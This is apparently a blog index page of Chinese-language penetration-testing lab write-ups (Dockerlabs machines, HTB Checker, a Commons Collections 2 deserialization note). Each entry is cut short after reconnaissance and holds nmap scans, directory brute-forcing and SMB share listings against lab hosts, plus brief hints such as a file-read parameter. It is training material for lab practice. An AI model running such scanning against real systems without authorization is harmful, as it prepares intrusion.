[root@kali] /home/kali/Inclusion  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 20:33 CST
Nmap scan report for sitio.dl (172.17.0.2)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA)
|_  256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms sitio.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

Gobuster

[root@kali] /home/kali/Inclusion  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/shop                 (Status: 301) [Size: 307] [--> http://172.17.0.2/shop/]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

再扫**/shop**

Dockerlabs-Sites

Fri, 28 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/sites  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 20:05 CST
Nmap scan report for 172.17.0.2
Host is up (0.000077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 cb:8f:50:db:6d:d8:d4:ac:bf:54:b0:62:12:7c:f0:01 (ECDSA)
|_  256 ca:6b:c7:0c:2a:d6:0e:3e:ff:c4:6e:61:ac:35:db:01 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Configuraci\xC3\xB3n de Apache y Seguridad en Sitios Web
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.63 seconds

Gobuster

[root@kali] /home/kali/sites  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php               ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/vulnerable.php       (Status: 200) [Size: 37]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

ReadAnyFiles

HTB-Checker

Thu, 27 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/Checker  
❯ nmap checker.htb -sV   

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd
8080/tcp open  http    Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

在checker.htb:8080页面上发现了一个子域名：vault

CommonCollections-2

Wed, 26 Feb 2025 00:00:00 +0000

Environment

Pom.xml

        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>
        <dependency>
            <groupId>org.javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.22.0-GA</version>
        </dependency>

TemplatesImpI

这个类用于加载恶意类，当声明一个实例的时候会触发getTransletInstance方法

查看getTransletInstance中**_name**变量为空则直接返回

Dockerlabs-Swiss

Wed, 26 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/swiss  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 19:53 CST
Nmap scan report for realgob.dl (172.17.0.2)
Host is up (0.00026s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 f1:2d:b0:54:e3:57:94:c8:3a:1a:7a:ba:d8:2d:7e:f9 (ECDSA)
80/tcp open  tcpwrapped
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: \xF0\x9F\x91\x8B Mario \xC3\x81lvarez Fer\xC5\x84andez
MAC Address: 02:42:AC:11:00:02 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/25%OT=22%CT=1%CU=40368%PV=Y%DS=1%DC=D%G=Y%M=0242A
OS:C%TM=67BDAF4F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=Z%I
OS:I=I%TS=A)SEQ(SP=107%GCD=2%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7
OS:%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST1
OS:1)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%
OS:W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=
OS:Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=O%A=Z%F=R%
OS:O=%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms realgob.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.18 seconds

ffuf

扫描得到一个file参数可以进行读取文件

Dockerlabs-Apolos

Tue, 25 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 16:15 CST
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apple Store
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds

Dirsearch

[root@kali] /home/kali  
❯ dirsearch -u 172.17.0.2 -t 50 -i 200 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                     
                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/kali/reports/_172.17.0.2/_25-02-25_16-19-18.txt

Target: http://172.17.0.2/

[16:19:18] Starting:                                                                                                        
[16:19:35] 200 - 631B  - /login.php                                        
[16:19:41] 200 - 626B  - /register.php                                     
[16:19:47] 200 - 405B  - /uploads/                                         
[16:19:48] 200 - 0B  - /vendor/composer/autoload_static.php              
[16:19:48] 200 - 1KB - /vendor/composer/LICENSE                          
[16:19:48] 200 - 520B  - /vendor/                                          
[16:19:48] 200 - 0B  - /vendor/autoload.php                              
[16:19:48] 200 - 0B  - /vendor/composer/autoload_classmap.php
[16:19:48] 200 - 0B  - /vendor/composer/autoload_psr4.php                
[16:19:48] 200 - 0B  - /vendor/composer/ClassLoader.php
[16:19:48] 200 - 3KB - /vendor/composer/installed.json                   
[16:19:48] 200 - 0B  - /vendor/composer/autoload_namespaces.php          
[16:19:48] 200 - 0B  - /vendor/composer/autoload_real.php                
                                                                             
Task Completed

可以看到存在uploads目录

Dockerlabs-Chatme

Tue, 25 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/chatme  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 19:54 CST
Nmap scan report for 172.17.0.2
Host is up (0.000088s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: ChatMe - The Best Online Chat Solution
|_http-server-header: nginx/1.24.0 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

网页中存在chat.chatme.dl，将其添加到**/etc/hosts**

Dockerlabs-Report

Tue, 25 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Report  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 18:34 CST
Nmap scan report for 172.17.0.2
Host is up (0.000076s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 58:46:38:70:8c:d8:4a:89:93:07:b3:43:17:81:59:f1 (ECDSA)
|_  256 25:99:39:02:52:4b:80:3f:aa:a8:9a:d4:8e:9a:eb:10 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://realgob.dl/
3306/tcp open  mysql   MySQL 5.5.5-10.11.8-MariaDB-0ubuntu0.24.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.11.8-MariaDB-0ubuntu0.24.04.1
|   Thread ID: 8
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, InteractiveClient, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: SMf;1&jb.[aWoKfBUf~i
|_  Auth Plugin Name: mysql_native_password
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds

将realgob.dl添加到**/etc/hosts**

Dockerlabs-Grandma

Mon, 24 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap 10.10.10.2

[root@kali] /home/kali/grandma  
❯ nmap 10.10.10.2 -sV  -A                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 14:29 CST
Nmap scan report for 10.10.10.2
Host is up (0.000093s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f0:d4:14:46:ad:c7:15:dd:09:8d:5a:c9:4c:a0:41:86 (ECDSA)
|_  256 88:8f:11:21:2a:29:72:fb:60:cb:39:c7:97:05:aa:9d (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://grandma.dl/
5000/tcp open  http    aiohttp 3.9.1 (Python 3.12)
| http-title: Hospital - Calendar
|_Requested resource was /static/index.html
|_http-server-header: Python/3.12 aiohttp/3.9.1
MAC Address: 02:42:0A:0A:0A:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 10.10.10.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

将grandma.dl添加到**/etc/hosts**

Dockerlabs-Norc

Mon, 24 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV  -A                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 21:13 CST
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:5c:7b:fe:79:92:7a:f9:85:ec:a5:b9:27:25:db:85 (ECDSA)
|_  256 ba:69:95:e3:df:7e:42:ec:69:ed:74:9e:6b:f6:9a:06 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Did not follow redirect to http://norc.labs/?password-protected=login&redirect_to=http%3A%2F%2F172.17.0.2%2F
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.11 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds

将norc.labs添加到**/etc/hosts**

Dockerlabs-Mirame

Sat, 22 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Desktop  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 10:42 CST
Nmap scan report for 172.17.0.2
Host is up (0.000085s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 2c:ea:4a:d7:b4:c3:d4:e2:65:29:6c:12:c4:58:c9:49 (ECDSA)
|_  256 a7:a4:a4:2e:3b:c6:0a:e4:ec:bd:46:84:68:02:5d:30 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-title: Login Page
|_http-server-header: Apache/2.4.61 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds

进入网页是一个登录页面，尝试使用常见的默认账户登陆失败。

Dockerlabs-Rutas

Sat, 22 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Rutas  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 19:23 CST
Nmap scan report for 172.17.0.2
Host is up (0.000066s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0        0               0 Jul 11  2024 hola_disfruta
|_-rw-r--r-- 1 0        0             293 Jul 11  2024 respeta.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 3ubuntu13.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 63:16:54:2a:05:1d:8e:43:53:55:8b:d5:4e:35:c9:1f (ECDSA)
|_  256 21:24:77:5d:f8:2f:b2:64:ec:42:8b:0b:ef:f0:46:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.07 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

FTP

存在匿名登录，并且可以下载文件

Dockerlabs-Veveno

Sat, 22 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Veveno  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 16:04 CST
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:9c:7b:99:95:b6:e8:03:5a:6a:d4:69:69:4a:8d:35 (ECDSA)
|_  256 ec:ec:90:44:4e:66:64:22:f6:8b:cd:29:d2:b5:60:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds

Gobuster

[root@kali] /home/kali/Veveno  
❯ gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html                                 ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 310] [--> http://172.17.0.2/uploads/]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/problems.php         (Status: 200) [Size: 10671]
/index.html           (Status: 200) [Size: 10671]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 661680 / 661683 (100.00%)

可以看到存在一个problems.php，但是回显和index.html是一样的，猜测需要构造一个参数

Dockerlabs-WalkingCMS

Sat, 22 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/walkingcms  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 09:39 CST
Nmap scan report for 172.17.0.2
Host is up (0.000090s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.87 seconds

进入网页后是apache的默认页面

Dockerlabs-DanceSamba

Fri, 21 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/dance-samba  
❯ nmap 172.17.0.2 -sV  -A

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0        0              69 Aug 19  2024 nota.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a2:4e:66:7d:e5:2e:cf:df:54:39:b2:08:a9:97:79:21 (ECDSA)
|_  256 92:bf:d3:b8:20:ac:76:08:5b:93:d7:69:ef:e7:59:e1 (ED25519)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-02-21T12:45:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.11 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds

enum4linux

Dockerlabs-Memesploit

Fri, 21 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Memesploit  
❯ nmap 172.17.0.2 -sV 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 19:06 CST
Nmap scan report for 172.17.0.2
Host is up (0.0000080s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.58 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

SMB

[root@kali] /home/kali/Memesploit  
❯ smbclient -L //172.17.0.2/                                                                                                                             ⏎
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        --------- ---- -------
        print$          Disk      Printer Drivers
        share_memehydra Disk      
        IPC$            IPC       IPC Service (c9584cd8853e server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

存在一个share_memehydra的目录，但是必须要密码才能登录。

DockerLabs-Psycho

Fri, 21 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 15:07 CST
Nmap scan report for 172.17.0.2
Host is up (0.0000080s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds

Dirsearch

[root@kali] /home/kali/Psycho  
❯ dirsearch -u 172.17.0.2 -t 50     
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

